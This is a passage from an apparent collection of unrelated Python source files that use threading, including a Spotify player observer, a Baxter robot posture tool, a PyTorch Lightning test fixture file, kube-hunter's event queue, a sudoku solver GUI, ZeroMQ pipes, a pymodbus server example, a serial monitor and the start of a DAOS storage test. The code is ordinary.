return_after = 60
if not status.get('running', False):
terminating.wait(2)
continue
elif status.get('playing', False):
(artist, title) = (status['track']['artist_resource']['name'], status['track']['track_resource']['name'])
new_track = (artist, title)
else:
new_track = None
if new_track != old_track:
if new_track is not None:
logger.info('«{0:s}» notified us that it is now playing «{0:s}» by «{1:s}»…'.format(player_name, title, artist))
npn.notify(player_name, new_track)
else:
logger.info('«{0:s}» notified us that it is no longer playing anything…'.format(player_name))
npn.notify(player_name, None)
old_track = new_track
logger.info('«{0:s}» is bailing…'.format(player_name))
return True
except (ConnectionError, Timeout, JSONDecodeError, KeyError) as e:
logger.info('«{0:s}» RPC failed…'.format(player_name), exc_info=e)
return False
finally:
npn.notify(player_name, None)
class SpotifyWebHelperObserver:
__slots__ = ('_terminating', '_thread')
def __init__(self, npn):
self._terminating = threading.Event()
self._thread = threading.Thread(target=wait_for_helper, name='SpotifyWebHelperObserverThread', args=(npn, self._terminating))
self._thread.start()
def close(self):
self._terminating.set()
self._thread.join()
|
set_posture.py
|
#!/usr/bin/env python
"""
Tool that use to set Baxter into different modes
"""
import os
import rospy
import argparse
import baxter_interface
import yaml
from ik_solver import solve_IK
import threading
import alloy.ros
def move_arm_to_pose(limb_name, pose):
#create the baxter interface
limb_interface = baxter_interface.Limb(limb_name)
#do IK to solve the position
joint_position = solve_IK(limb_name, pose)
#zip the name and positions
joint_position = dict(zip(joint_position.name, joint_position.position))
#move the limb to the position
limb_interface.move_to_joint_positions(joint_position)
def move_to_posture(posture_name,record_path="posture_records.yaml", block=True, done_cb=None):
#rospy.init_node("bax_set_posture")
left_limb = baxter_interface.Limb('left')
right_limb = baxter_interface.Limb('right')
#resolve path
record_path = alloy.ros.resolve_res_path(record_path,"success_baxter_tools")
if record_path:
with open(record_path,'r') as f:
posture_list = yaml.load(f)
joint_angles = posture_list[posture_name]
if 'left' in joint_angles and 'right' in joint_angles:
lt = threading.Thread(target=left_limb.move_to_joint_positions, args=(joint_angles['left'],))
rt = threading.Thread(target=right_limb.move_to_joint_positions, args=(joint_angles['right'],))
lt.start()
rt.start()
lt.join()
rt.join()
elif 'left' in joint_angles:
left_limb.move_to_joint_positions(joint_angles['left'])
elif 'right' in joint_angles:
right_limb.move_to_joint_positions(joint_angles['right'])
def save_posture(posture_name, button_control=True, arm=None, record_path="posture_records.yaml"):
if button_control:
left_nav = baxter_interface.Navigator('left')
right_nav = baxter_interface.Navigator('right')
while not left_nav.button0 and not right_nav.button0:
rospy.sleep(0.1)
#save the position
left_joint_angles = baxter_interface.Limb('left').joint_angles()
right_joint_angles = baxter_interface.Limb('right').joint_angles()
posture_list = dict()
#resolve path
record_path = alloy.ros.resolve_res_path(record_path,"success_baxter_tools")
#create the file at the root of `success_baxter_tools\res` if doesn't exist
if record_path is None:
record_path = os.path.join(alloy.ros.create_res_dir("success_baxter_tools"),"posture_records.yaml")
#save them to some type of files
if not os.path.exists(record_path):
yaml.dump(posture_list,file(record_path,'w'))
with open(record_path,'rw') as f:
posture_list = yaml.load(f)
if arm == 'right':
posture_list[posture_name] = {
'right': right_joint_angles
}
elif arm == 'left':
posture_list[posture_name] = {
'left': left_joint_angles,
}
else:
posture_list[posture_name] = {
'left': left_joint_angles,
'right': right_joint_angles
}
yaml.dump(posture_list, file(record_path,'w'))
|
conftest.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import signal
import sys
import threading
from functools import partial
from http.server import SimpleHTTPRequestHandler
from pathlib import Path
import pytest
import torch.distributed
from pytorch_lightning.plugins.environments.lightning_environment import find_free_network_port
from pytorch_lightning.trainer.connectors.signal_connector import SignalConnector
from pytorch_lightning.utilities.imports import _IS_WINDOWS, _TORCH_GREATER_EQUAL_1_8
from tests import _PATH_DATASETS
@pytest.fixture(scope="session")
def datadir():
return Path(_PATH_DATASETS)
@pytest.fixture(scope="function", autouse=True)
def preserve_global_rank_variable():
"""Ensures that the rank_zero_only.rank global variable gets reset in each test."""
from pytorch_lightning.utilities.distributed import rank_zero_only
rank = getattr(rank_zero_only, "rank", None)
yield
if rank is not None:
setattr(rank_zero_only, "rank", rank)
@pytest.fixture(scope="function", autouse=True)
def restore_env_variables():
"""Ensures that environment variables set during the test do not leak out."""
env_backup = os.environ.copy()
yield
leaked_vars = os.environ.keys() - env_backup.keys()
# restore environment as it was before running the test
os.environ.clear()
os.environ.update(env_backup)
# these are currently known leakers - ideally these would not be allowed
allowlist = {
"CUBLAS_WORKSPACE_CONFIG", # enabled with deterministic flag
"CUDA_DEVICE_ORDER",
"LOCAL_RANK",
"NODE_RANK",
"WORLD_SIZE",
"MASTER_ADDR",
"MASTER_PORT",
"PL_GLOBAL_SEED",
"PL_SEED_WORKERS",
"WANDB_MODE",
"HOROVOD_FUSION_THRESHOLD",
"RANK", # set by DeepSpeed
"POPLAR_ENGINE_OPTIONS", # set by IPUPlugin
# set by XLA
"TF2_BEHAVIOR",
"XRT_MESH_SERVICE_ADDRESS",
"XRT_TORCH_DIST_ROOT",
"XRT_MULTI_PROCESSING_DEVICE",
"XRT_SHARD_WORLD_SIZE",
"XRT_LOCAL_WORKER",
"XRT_HOST_WORLD_SIZE",
"XRT_SHARD_ORDINAL",
"XRT_SHARD_LOCAL_ORDINAL",
}
leaked_vars.difference_update(allowlist)
assert not leaked_vars, f"test is leaking environment variable(s): {set(leaked_vars)}"
@pytest.fixture(scope="function", autouse=True)
def restore_signal_handlers():
"""Ensures that signal handlers get restored before the next test runs.
This is a safety net for tests that don't run Trainer's teardown.
"""
valid_signals = SignalConnector._valid_signals()
if not _IS_WINDOWS:
# SIGKILL and SIGSTOP are not allowed to be modified by the user
valid_signals -= {signal.SIGKILL, signal.SIGSTOP}
handlers = {signum: signal.getsignal(signum) for signum in valid_signals}
yield
for signum, handler in handlers.items():
if handler is not None:
signal.signal(signum, handler)
@pytest.fixture(scope="function", autouse=True)
def teardown_process_group():
"""Ensures that the distributed process group gets closed before the next test runs."""
yield
if torch.distributed.is_available() and torch.distributed.is_initialized():
torch.distributed.destroy_process_group()
@pytest.fixture(scope="function", autouse=True)
def reset_deterministic_algorithm():
"""Ensures that torch determinism settings are reset before the next test runs."""
yield
if _TORCH_GREATER_EQUAL_1_8:
torch.use_deterministic_algorithms(False)
else:
torch.set_deterministic(False)
@pytest.fixture
def caplog(caplog):
"""Workaround for https://github.com/pytest-dev/pytest/issues/3697.
Setting ``filterwarnings`` with pytest breaks ``caplog`` when ``not logger.propagate``.
"""
import logging
lightning_logger = logging.getLogger("pytorch_lightning")
propagate = lightning_logger.propagate
lightning_logger.propagate = True
yield caplog
lightning_logger.propagate = propagate
@pytest.fixture
def tmpdir_server(tmpdir):
if sys.version_info >= (3, 7):
Handler = partial(SimpleHTTPRequestHandler, directory=str(tmpdir))
from http.server import ThreadingHTTPServer
else:
# unfortunately SimpleHTTPRequestHandler doesn't accept the directory arg in python3.6
# so we have to hack it like this
class Handler(SimpleHTTPRequestHandler):
def translate_path(self, path):
# get the path from cwd
path = super().translate_path(path)
# get the relative path
relpath = os.path.relpath(path, os.getcwd())
# return the full path from root_dir
return os.path.join(str(tmpdir), relpath)
# ThreadingHTTPServer was added in 3.7, so we need to define it ourselves
from http.server import HTTPServer
from socketserver import ThreadingMixIn
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
daemon_threads = True
with ThreadingHTTPServer(("localhost", 0), Handler) as server:
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
yield server.server_address
server.shutdown()
@pytest.fixture
def single_process_pg():
"""Initialize the default process group with only the current process for testing purposes.
The process group is destroyed when the with block is exited.
"""
if torch.distributed.is_initialized():
raise RuntimeError("Can't use `single_process_pg` when the default process group is already initialized.")
orig_environ = os.environ.copy()
os.environ["MASTER_ADDR"] = "localhost"
os.environ["MASTER_PORT"] = str(find_free_network_port())
os.environ["RANK"] = "0"
os.environ["WORLD_SIZE"] = "1"
torch.distributed.init_process_group("gloo")
try:
yield
finally:
torch.distributed.destroy_process_group()
os.environ.clear()
os.environ.update(orig_environ)
def pytest_collection_modifyitems(items):
# filter out special tests
if os.getenv("PL_RUN_STANDALONE_TESTS", "0") == "1":
items[:] = [
item
for item in items
for marker in item.own_markers
# has `@RunIf(standalone=True)`
if marker.name == "skipif" and marker.kwargs.get("standalone")
]
elif os.getenv("PL_RUN_SLOW_TESTS", "0") == "1":
items[:] = [
item
for item in items
for marker in item.own_markers
# has `@RunIf(slow=True)`
if marker.name == "skipif" and marker.kwargs.get("slow")
]
|
handler.py
|
import logging
import time
from collections import defaultdict
from queue import Queue
from threading import Thread
from kube_hunter.conf import config
from kube_hunter.core.types import ActiveHunter, HunterBase
from kube_hunter.core.events.types import Vulnerability, EventFilterBase
logger = logging.getLogger(__name__)
# Inherits Queue object, handles events asynchronously
class EventQueue(Queue, object):
def __init__(self, num_worker=10):
super(EventQueue, self).__init__()
self.passive_hunters = dict()
self.active_hunters = dict()
self.all_hunters = dict()
self.hooks = defaultdict(list)
self.filters = defaultdict(list)
self.running = True
self.workers = list()
for _ in range(num_worker):
t = Thread(target=self.worker)
t.daemon = True
t.start()
self.workers.append(t)
t = Thread(target=self.notifier)
t.daemon = True
t.start()
# decorator wrapping for easy subscription
def subscribe(self, event, hook=None, predicate=None):
def wrapper(hook):
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# wrapper takes care of the subscribe once mechanism
def subscribe_once(self, event, hook=None, predicate=None):
def wrapper(hook):
# installing a __new__ magic method on the hunter
# which will remove the hunter from the list upon creation
def __new__unsubscribe_self(self, cls):
handler.hooks[event].remove((hook, predicate))
return object.__new__(self)
hook.__new__ = __new__unsubscribe_self
self.subscribe_event(event, hook=hook, predicate=predicate)
return hook
return wrapper
# getting uninstantiated event object
def subscribe_event(self, event, hook=None, predicate=None):
if ActiveHunter in hook.__mro__:
if not config.active:
return
self.active_hunters[hook] = hook.__doc__
elif HunterBase in hook.__mro__:
self.passive_hunters[hook] = hook.__doc__
if HunterBase in hook.__mro__:
self.all_hunters[hook] = hook.__doc__
# registering filters
if EventFilterBase in hook.__mro__:
if hook not in self.filters[event]:
self.filters[event].append((hook, predicate))
logger.debug(f"{hook} filter subscribed to {event}")
# registering hunters
elif hook not in self.hooks[event]:
self.hooks[event].append((hook, predicate))
logger.debug(f"{hook} subscribed to {event}")
def apply_filters(self, event):
# if filters are subscribed, apply them on the event
for hooked_event in self.filters.keys():
if hooked_event in event.__class__.__mro__:
for filter_hook, predicate in self.filters[hooked_event]:
if predicate and not predicate(event):
continue
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
event = filter_hook(event).execute()
# if filter decided to remove event, returning None
if not event:
return None
return event
# getting instantiated event object
def publish_event(self, event, caller=None):
# setting event chain
if caller:
event.previous = caller.event
event.hunter = caller.__class__
# applying filters on the event, before publishing it to subscribers.
# if filter returned None, not proceeding to publish
event = self.apply_filters(event)
if event:
# If event was rewritten, make sure it's linked to its parent ('previous') event
if caller:
event.previous = caller.event
event.hunter = caller.__class__
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if config.statistics and caller:
if Vulnerability in event.__class__.__mro__:
caller.__class__.publishedVulnerabilities += 1
logger.debug(f"Event {event.__class__} got published with {event}")
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
try:
hook = self.get()
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
hook.execute()
except Exception as ex:
logger.debug(ex, exc_info=True)
finally:
self.task_done()
logger.debug("closing thread...")
def notifier(self):
time.sleep(2)
# should consider locking on unfinished_tasks
while self.unfinished_tasks > 0:
logger.debug(f"{self.unfinished_tasks} tasks left")
time.sleep(3)
if self.unfinished_tasks == 1:
logger.debug("final hook is hanging")
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)
|
gui.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 2 19:11:28 2020
@author: victor
"""
from tkinter import *
from timeit import default_timer as timer
from tkinter import messagebox
import threading
import copy
from sudokucsp import SudokuCSP
# if you want to verify that my csp.py does a better job just change
# from csp import ... to from original import ... , original is the csp.py file from AIMA code
from csp import backtracking_search, mrv, unordered_domain_values, forward_checking, mac, no_inference
MARGIN = 20 # Pixels around the board
SIDE = 50 # Width of every board cell
WIDTH_B = HEIGHT_B = MARGIN * 2 + SIDE * 9 # Width and height of the whole board
WIDTH = WIDTH_B + 180 # Width of board and buttons solve and reset
class SudokuUI(Frame):
def __init__(self, parent):
self.parent = parent
# we start with a blank board
self.original_board = [[0 for j in range(9)] for i in range(9)]
# ofc we should have another board in which we will show solution
self.current_board = copy.deepcopy(self.original_board)
Frame.__init__(self, parent)
self.row, self.col = 0, 0
self.__initUI()
def __initUI(self):
# we will initializate stuff that will be shown in the gui
self.pack(fill=BOTH, expand=1)
self.canvas = Canvas(self, width=WIDTH_B, height=HEIGHT_B)
self.canvas.pack(fill=BOTH, side=TOP)
self.canvas.grid(row=0, column=0, rowspan=30, columnspan=60)
# level will be used to select the lvl of the board, 1 means easy and 2 hard
self.level = IntVar(value=1)
# which will be used to select which board at which lvl, there are 3 for each level
self.which = 0
# we will need a StringVar so that the client can see the time used by an algorithm
self.time = StringVar()
self.time.set("Time: ")
# same for number of backtracks
self.n_bt = StringVar()
self.n_bt.set("N. BT: ")
self.make_menu()
# the default will be the board of lvl 1 and which 1
self.__change_level()
self.clear_button = Button(self, text="Reset", command=self.__clear_board, width=15, height=5)
self.clear_button.grid(row=10, column=61, padx=20, columnspan=3)
self.solve_button = Button(self, text="Solve", command=self.solve_clicked, width=15, height=5)
self.solve_button.grid(row=13, column=61, padx=20, columnspan=3)
lbltime = Label(self, textvariable=self.time)
lblBT = Label(self, textvariable=self.n_bt)
Label(self, text="Inference: ").grid(row=14, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.inference = StringVar()
self.radio = []
self.radio.append(Radiobutton(self, text="No Inference", variable=self.inference, value="NO_INFERENCE"))
self.radio[0].grid(row=15, column=62, padx=2)
self.radio.append(Radiobutton(self, text="FC ", variable=self.inference, value="FC"))
self.radio[1].grid(row=16, column=62)
self.radio.append(Radiobutton(self, text="MAC ", variable=self.inference, value="MAC"))
self.radio[2].grid(row=17, column=62)
self.inference.set("NO_INFERENCE")
Label(self, text="Variable to choose:").grid(row=18, column=61)
lbltime.grid(row=30, column=0)
lblBT.grid(row=32, column=0)
self.var_to_choose = StringVar()
self.radio.append(Radiobutton(self, text="MRV", variable=self.var_to_choose, value="MRV"))
self.radio[3].grid(row=20, column=62)
self.var_to_choose.set("MRV")
self.__draw_grid()
self.__draw_puzzle()
def solve_clicked(self):
# we are searching for a solution so it is good to disable buttons
for rb in self.radio:
rb.config(state=DISABLED)
self.clear_button.config(state=DISABLED)
self.solve_button.config(state=DISABLED)
self.menu_bar.entryconfig("Level", state="disabled")
p = threading.Thread(target=self.solve_sudoku)
p.start()
messagebox.showinfo("Working", "We are looking for a solution, please wait some seconds ...")
def solve_sudoku(self):
s = SudokuCSP(self.current_board)
inf, dv, suv = None, None, None
if self.inference.get() == "NO_INFERENCE":
inf = no_inference
elif self.inference.get() == "FC":
inf = forward_checking
elif self.inference.get() == "MAC":
inf = mac
if self.var_to_choose.get() == "MRV":
suv = mrv
start = timer()
a = backtracking_search(s, select_unassigned_variable=suv, order_domain_values=unordered_domain_values,
inference=inf)
end = timer()
# if a isn't null we found a solution so we will show it in the current board
# if a is null then we send a message to the user that the initial board
# breaks some constraints
if a:
for i in range(9):
for j in range(9):
index = i * 9 + j
self.current_board[i][j] = a.get("CELL" + str(index))
else:
messagebox.showerror("Error", "Invalid sudoku puzzle, please check the initial state")
# showing solution
self.__draw_puzzle()
self.time.set("Time: "+str(round(end-start, 5))+" seconds")
self.n_bt.set("N. BR: "+str(s.n_bt))
# re-enabling buttons for search a new solution
for rb in self.radio:
rb.config(state=NORMAL)
self.clear_button.config(state=NORMAL)
self.solve_button.config(state=NORMAL)
self.menu_bar.entryconfig("Level", state="normal")
def make_menu(self):
# creating menu with level Easy and Hard
self.menu_bar = Menu(self.parent)
self.parent.configure(menu=self.menu_bar)
level_menu = Menu(self.menu_bar, tearoff=False)
self.menu_bar.add_cascade(label="Level", menu=level_menu)
level_menu.add_radiobutton(label="Easy", variable=self.level, value=1, command=self.__change_level)
level_menu.add_radiobutton(label="Hard", variable=self.level, value=2, command=self.__change_level)
def __change_level(self):
# to add a new board, you just have to change %3 to %4 and then add another
# clause elif like "elif self.which == 3:"
self.which = (self.which+1) % 3
if self.level.get() == 1:
if self.which == 0:
self.original_board[0] = [0, 6, 0, 3, 0, 0, 8, 0, 4]
self.original_board[1] = [5, 3, 7, 0, 9, 0, 0, 0, 0]
self.original_board[2] = [0, 4, 0, 0, 0, 6, 0, 0, 7]
self.original_board[3] = [0, 9, 0, 0, 5, 0, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[5] = [7, 1, 3, 0, 2, 0, 0, 4, 0]
self.original_board[6] = [3, 0, 6, 4, 0, 0, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 6, 0, 5, 2, 3]
self.original_board[8] = [1, 0, 2, 0, 0, 9, 0, 8, 0]
elif self.which == 1:
self.original_board[0] = [7, 9, 0, 4, 0, 2, 3, 8, 1]
self.original_board[1] = [5, 0, 3, 0, 0, 0, 9, 0, 0]
self.original_board[2] = [0, 0, 0, 0, 3, 0, 0, 7, 0]
self.original_board[3] = [0, 0, 0, 0, 0, 5, 0, 0, 2]
self.original_board[4] = [9, 2, 0, 8, 1, 0, 7, 0, 0]
self.original_board[5] = [4, 6, 0, 0, 0, 0, 5, 1, 9]
self.original_board[6] = [0, 1, 0, 0, 0, 0, 2, 3, 8]
self.original_board[7] = [8, 0, 0, 0, 4, 1, 0, 0, 0]
self.original_board[8] = [0, 0, 9, 0, 8, 0, 1, 0, 4]
elif self.which == 2:
self.original_board[0] = [0, 3, 0, 5, 0, 6, 2, 0, 0]
self.original_board[1] = [8, 2, 0, 0, 0, 1, 0, 0, 4]
self.original_board[2] = [6, 0, 7, 8, 3, 0, 0, 9, 1]
self.original_board[3] = [0, 0, 0, 0, 0, 0, 0, 2, 9]
self.original_board[4] = [5, 0, 0, 6, 0, 7, 0, 0, 3]
self.original_board[5] = [3, 9, 0, 0, 0, 0, 0, 0, 0]
self.original_board[6] = [4, 5, 0, 0, 8, 9, 1, 0, 2]
self.original_board[7] = [9, 0, 0, 1, 0, 0, 0, 4, 6]
self.original_board[8] = [0, 0, 3, 7, 0, 4, 0, 5, 0]
elif self.level.get() == 2:
if self.which == 0:
self.original_board[0] = [8, 0, 0, 0, 0, 0, 0, 0, 0]
self.original_board[1] = [0, 0, 3, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 7, 0, 0, 9, 0, 2, 0, 0]
self.original_board[3] = [0, 5, 0, 0, 0, 7, 0, 0, 0]
self.original_board[4] = [0, 0, 0, 0, 4, 5, 7, 0, 0]
self.original_board[5] = [0, 0, 0, 1, 0, 0, 0, 3, 0]
self.original_board[6] = [0, 0, 1, 0, 0, 0, 0, 6, 8]
self.original_board[7] = [0, 0, 8, 5, 0, 0, 0, 1, 0]
self.original_board[8] = [0, 9, 0, 0, 0, 0, 4, 0, 0]
elif self.which == 1:
self.original_board[0] = [2, 0, 0, 0, 0, 0, 0, 4, 3]
self.original_board[1] = [1, 9, 0, 0, 3, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 0, 0, 5, 0, 0, 0]
self.original_board[3] = [0, 5, 0, 2, 6, 0, 0, 0, 8]
self.original_board[4] = [0, 0, 0, 0, 7, 0, 0, 0, 0]
self.original_board[5] = [6, 0, 0, 0, 5, 3, 0, 1, 0]
self.original_board[6] = [0, 0, 0, 6, 0, 0, 0, 2, 0]
self.original_board[7] = [0, 0, 0, 0, 8, 0, 0, 3, 4]
self.original_board[8] = [9, 1, 0, 0, 0, 0, 0, 0, 6]
elif self.which == 2:
self.original_board[0] = [0, 0, 0, 0, 2, 0, 0, 0, 5]
self.original_board[1] = [0, 0, 1, 6, 0, 0, 0, 0, 0]
self.original_board[2] = [0, 6, 0, 7, 0, 0, 0, 8, 1]
self.original_board[3] = [0, 0, 0, 3, 0, 0, 5, 0, 0]
self.original_board[4] = [3, 0, 8, 5, 0, 6, 2, 0, 9]
self.original_board[5] = [0, 0, 4, 0, 0, 7, 0, 0, 0]
self.original_board[6] = [7, 4, 0, 0, 0, 9, 0, 1, 0]
self.original_board[7] = [0, 0, 0, 0, 0, 5, 9, 0, 0]
self.original_board[8] = [8, 0, 0, 0, 7, 0, 0, 0, 0]
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
def __draw_grid(self):
for i in range(10):
if i % 3 == 0:
color = "black"
else:
color = "gray"
x0 = MARGIN + i * SIDE
y0 = MARGIN
x1 = MARGIN + i * SIDE
y1 = HEIGHT_B - MARGIN
self.canvas.create_line(x0, y0, x1, y1, fill=color)
x0 = MARGIN
y0 = MARGIN + i * SIDE
x1 = WIDTH_B - MARGIN
y1 = MARGIN + i * SIDE
self.canvas.create_line(x0, y0, x1, y1, fill=color)
def __draw_puzzle(self):
self.canvas.delete("numbers")
self.time.set("Time: ")
self.n_bt.set("N. BT: ")
for i in range(9):
for j in range(9):
cell = self.current_board[i][j]
if cell != 0:
x = MARGIN + j * SIDE + SIDE / 2
y = MARGIN + i * SIDE + SIDE / 2
if str(cell) == str(self.original_board[i][j]):
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="black")
else:
self.canvas.create_text(x, y, text=cell, tags="numbers", fill="red")
def __clear_board(self):
self.current_board = copy.deepcopy(self.original_board)
self.__draw_puzzle()
|
push_pipe.py
|
# -*- coding:utf8 -*-
# File : push_pipe.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 4/2/17
#
# This file is part of TensorArtist.
from . import configs, utils
from ...core.utils.meta import notnone_property
import zmq
import threading
import queue
import contextlib
import collections
import pickle
import functools
# import msgpack
# import msgpack_numpy
# msgpack_numpy.patch()
# dumpb = functools.partial(msgpack.dumps, use_bin_type=True)
# loadb = msgpack.loads
import pickle
dumpb = pickle.dumps
loadb = pickle.loads
__all__ = ['PushPipe', 'PullPipe', 'make_push_pair']
class PullPipe(object):
def __init__(self, name, mode='tcp'):
self._name = name
self._mode = mode
self._conn_info = None
self._context = zmq.Context()
self._sock = self._context.socket(zmq.PULL)
self._sock.set_hwm(2)
@notnone_property
def conn_info(self):
return self._conn_info
def initialize(self):
if self._conn_info is not None:
return
if self._mode == 'tcp':
port = self._sock.bind_to_random_port('tcp://*')
self._conn_info = 'tcp://{}:{}'.format(utils.get_addr(), port)
elif self._mode == 'ipc':
self._conn_info = utils.bind_to_random_ipc(self._sock, self._name)
def finalize(self):
utils.graceful_close(self._sock)
self._context.term()
@contextlib.contextmanager
def activate(self):
self.initialize()
try:
yield
finally:
self.finalize()
def recv(self):
try:
return loadb(self._sock.recv(copy=False).bytes)
except zmq.ContextTerminated:
pass
class PushPipe(object):
def __init__(self, conn_info, send_qsize=10):
self._conn_info = conn_info
self._send_qsize = send_qsize
self._context = None
self._sock = None
self._send_queue = None
self._send_thread = None
def initialize(self):
self._context = zmq.Context()
self._sock = self._context.socket(zmq.PUSH)
self._sock.set_hwm(2)
self._sock.connect(self._conn_info)
self._send_queue = queue.Queue(maxsize=self._send_qsize)
self._send_thread = threading.Thread(target=self.mainloop_send, daemon=True)
self._send_thread.start()
def finalize(self):
utils.graceful_close(self._sock)
self._context.term()
@contextlib.contextmanager
def activate(self):
self.initialize()
try:
yield
finally:
self.finalize()
def mainloop_send(self):
try:
while True:
job = self._send_queue.get()
self._sock.send(dumpb(job), copy=False)
except zmq.ContextTerminated:
pass
def send(self, payload):
self._send_queue.put(payload)
return self
def make_push_pair(name, nr_workers=None, mode='tcp', send_qsize=10):
pull = PullPipe(name, mode=mode)
pull.initialize()
nr_pushs = nr_workers or 1
pushs = [PushPipe(pull.conn_info, send_qsize=send_qsize) for i in range(nr_pushs)]
if nr_workers is None:
return pull, pushs[0]
return pull, pushs
|
custom_datablock.py
|
#!/usr/bin/env python
"""
Pymodbus Server With Custom Datablock Side Effect
--------------------------------------------------------------------------
This is an example of performing custom logic after a value has been
written to the datastore.
"""
# --------------------------------------------------------------------------- #
# import the modbus libraries we need
# --------------------------------------------------------------------------- #
from __future__ import print_function
from pymodbus.version import version
from pymodbus.server.asynchronous import StartTcpServer
from pymodbus.device import ModbusDeviceIdentification
from pymodbus.datastore import ModbusSparseDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from pymodbus.transaction import ModbusRtuFramer, ModbusAsciiFramer
# --------------------------------------------------------------------------- #
# configure the service logging
# --------------------------------------------------------------------------- #
import logging
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.DEBUG)
# --------------------------------------------------------------------------- #
# create your custom data block here
# --------------------------------------------------------------------------- #
class CustomDataBlock(ModbusSparseDataBlock):
""" A datablock that stores the new value in memory
and performs a custom action after it has been stored.
"""
def setValues(self, address, value):
""" Sets the requested values of the datastore
:param address: The starting address
:param values: The new values to be set
"""
super(CustomDataBlock, self).setValues(address, value)
# whatever you want to do with the written value is done here,
# however make sure not to do too much work here or it will
# block the server, espectially if the server is being written
# to very quickly
print("wrote {} to {}".format(value, address))
def run_custom_db_server():
# ----------------------------------------------------------------------- #
# initialize your data store
# ----------------------------------------------------------------------- #
block = CustomDataBlock([0]*100)
store = ModbusSlaveContext(di=block, co=block, hr=block, ir=block)
context = ModbusServerContext(slaves=store, single=True)
# ----------------------------------------------------------------------- #
# initialize the server information
# ----------------------------------------------------------------------- #
identity = ModbusDeviceIdentification()
identity.VendorName = 'pymodbus'
identity.ProductCode = 'PM'
identity.VendorUrl = 'http://github.com/riptideio/pymodbus/'
identity.ProductName = 'pymodbus Server'
identity.ModelName = 'pymodbus Server'
identity.MajorMinorRevision = version.short()
# ----------------------------------------------------------------------- #
# run the server you want
# ----------------------------------------------------------------------- #
# p = Process(target=device_writer, args=(queue,))
# p.start()
StartTcpServer(context, identity=identity, address=("localhost", 5020))
if __name__ == "__main__":
run_custom_db_server()
|
simplemonitor.py
|
import serial
import sys
from binascii import hexlify
import threading
def monitor(portname, outfile=sys.stdout, stop_evt=None):
data = b""
extra = b""
with serial.Serial(portname, 115200, timeout=0.01) as sp:
while True if stop_evt is None else not stop_evt.wait(0):
data += sp.read()
while len(data) > 8:
if(data[0] == 0x24 and
data[1] == 0x43 and
data[5] == 0x23):
if len(extra):
outfile.write("extra: %s " % hexlify(extra))
extra = b""
outfile.write(
"cmd: 0x%02x = 0x%04x\n" % (data[2], (data[3] << 8) + data[4]))
data = data[8:]
elif (data[0] == 0x2b and
data[3] == 0x23):
if len(extra):
outfile.write("extra: %s" % hexlify(extra))
extra = b""
outfile.write("rsp: 0x%04x\n" % ((data[1] << 8) + data[2]))
data = data[6:]
else:
extra += data[0:1]
data = data[1:]
def monitorfile(portname, filename, stop):
with open(filename, "w") as f:
monitor(portname, f, stop)
def monitorall(portnames=["/dev/ttyUSB0", "/dev/ttyUSB1", "/dev/ttyUSB2"],
filenames=["curl.txt", "lift.txt", "swing.txt"]):
ts = []
stop = threading.Event()
for pn, fn in zip(portnames, filenames):
ts.append(threading.Thread(target=monitorfile, args=(pn, fn, stop)))
for t in ts:
t.start()
def stopfn():
stop.set()
for t in ts:
t.join()
return stopfn
|
online_extend.py
|
#!/usr/bin/python
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import time
import threading
from test_utils_pool import add_pool
from write_host_file import write_host_file
from daos_racer_utils import DaosRacerCommand
from dmg_utils import check_system_query_status
from osa_utils import OSAUtils
from apricot import skipForTicket
from daos_utils import DaosCommand
class OSAOnlineExtend(OSAUtils):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server Online Extend test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.dmg_command = self.get_dmg_command()
self.daos_command = DaosCommand(self.bin)
self.ior_test_sequence = self.params.get(
"ior_test_sequence", '/run/ior/iorflags/*')
self.test_oclass = self.params.get("oclass", '/run/test_obj_class/*')
self.ranks = self.params.get("rank_list", '/run/test_ranks/*')
# Start an additional server.
self.extra_servers = self.params.get("test_servers",
"/run/extra_servers/*")
# Recreate the client hostfile without slots defined
self.hostfile_clients = write_host_file(
self.hostlist_clients, self.workdir, None)
self.pool = None
self.dmg_command.exit_status_exception = True
self.daos_racer = None
def daos_racer_thread(self):
"""Start the daos_racer thread."""
self.daos_racer = DaosRacerCommand(self.bin, self.hostlist_clients[0],
self.dmg_command)
self.daos_racer.get_params(self)
self.daos_racer.set_environment(
self.daos_racer.get_environment(self.server_managers[0]))
self.daos_racer.run()
def run_online_extend_test(self, num_pool, racer=False,
oclass=None, app_name="ior"):
"""Run the Online extend without data.
Args:
num_pool(int) : total pools to create for testing purposes.
racer(bool) : Run the testing along with daos_racer.
Defaults to False.
oclass(str) : Object Class (eg: RP_2G1, etc). Default to None.
app_name(str) : App (ior or mdtest) to run during the testing.
Defaults to ior.
"""
# Pool dictionary
pool = {}
